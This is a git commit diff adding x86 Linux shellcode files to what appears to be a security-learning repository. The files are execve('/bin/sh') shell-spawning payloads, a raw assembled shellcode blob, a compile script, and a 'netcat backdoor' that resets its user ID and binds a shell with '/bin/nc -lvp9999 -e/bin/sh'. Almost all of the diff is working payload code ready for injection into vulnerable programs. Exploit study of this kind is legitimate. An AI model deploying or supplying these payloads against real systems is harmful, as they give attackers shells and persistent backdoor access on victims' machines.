docs: Clean up resources for Hackoctoberfest 2019 (#41)

* Clean up resources for Hackoctoberfest 2019

* 👩🏾‍🦱 Add cloud hacking readme

Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/RUNNING_ASM.sh

@@ -0,0 +1 @@
+nasm shellspawn.asm

Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/asm_compiler.sh

@@ -0,0 +1,10 @@
+#!/bin/bash
+if [ $# -ne 1 ]
+then
+    printf "\n\tUsage: $0 filename\n\n"
+    exit
+fi
+filename=`echo $1 | sed s/"\$"//`
+nasm -f elf $filename.asm && ld $filename.o -o $filename
+
+echo "Successfully compiled."

Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/get_shell.asm

@@ -0,0 +1,19 @@
+;Universal Shellcode for Unix/Linux 
+section .text           ; Text section
+        global _start   ; Define _start function
+
+_start:                 ; _start function
+xor eax, eax            ; Zero out eax REGister
+xor ebx, ebx            ; Zero out ebx REGister
+xor ecx, ecx            ; Zero out ecx REGister
+cdq                     ; Zero out edx using the sign bit from eax
+push ecx                ; Insert 4 byte null in stack
+push 0x68732f6e         ; Insert /bin in the stack
+push 0x69622f2f         ; Insert //sh in the stack
+mov  ebx, esp           ; Put /bin//sh in stack
+push ecx                ; Put 4 Byte in stack
+push ebx                ; Put ebx in stack
+mov  ecx, esp           ; Insert ebx address in ecx
+xor  eax, eax           ; Zero out eax register
+mov  al, 11             ; Insert __NR_execve 11 syscall
+int  0x80               ; Syscall execute

Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/netcat_backdoor.asm

@@ -0,0 +1,29 @@
+;netcat backdoor to inject as a shellcode
+jmp short todo
+shellcode:
+xor eax, eax 		; Zero out eax
+xor ebx, ebx		; Zero out ebx
+xor ecx, ecx		; Zero out ecx
+xor edx, edx		; Zero out edx using the sign bit from eax
+mov BYTE al, 0xa4 	; setresuid syscall 164 (0xa4)
+int 0x80		; syscall execute
+pop esi			; esi contain the string in db
+xor eax, eax		; Zero out eax
+mov[esi + 7], al	; null terminate /bin/nc
+mov[esi +  16], al 	; null terminate -lvp90
+mov[esi +  26], al	; null terminate -e/bin/sh
+mov[esi +  27], esi	; store address of /bin/nc in AAAA
+lea ebx, [esi + 8]	; load address of -lvp90 into ebx
+mov[esi +31], ebx	; store address of -lvp90 in BBB taken from ebx
+lea ebx, [esi + 17]	; load address of -e/bin/sh into  ebx
+mov[esi + 35], ebx	; store address of -e/bin/sh in CCCC taken from ebx
+mov[esi + 39], eax 	; Zero out DDDD
+mov al, 11		; 11 is execve  syscakk number
+mov ebx, esi		; store address of  /bin/nc 
+lea ecx, [esi + 27]	; load address of ptr to argv[] array
+lea edx, [esi + 39] 	; envp[] NULL
+int 0x80		; syscall execute 
+todo:
+call shellcode
+db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'
+;   0123456789012345678901234567890123456789012

Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn

@@ -0,0 +1 @@
+1ÀPh//shh/bin‰ãP‰âP‰á°Í€

Vulnerabilities_and_Exploits/Memory_Exploits/Assembly/shellspawn.asm

@@ -0,0 +1,14 @@
+BITS 32
+
+xor eax, eax        ; zero eax
+push eax            ; null terminate the string
+push 0x68732f2f     ; push //sh (// is same as / for our purpose)
+push 0x6e69622f     ; push /bin
+mov ebx, esp        ; pass first argument using ebx
+push eax            ; third argument is empty
+mov edx, esp
+push eax            ; second argument is empty
+mov ecx, esp
+mov al, 11          ; execve is system call #11
+int 0x80            ; issue an interrupt
+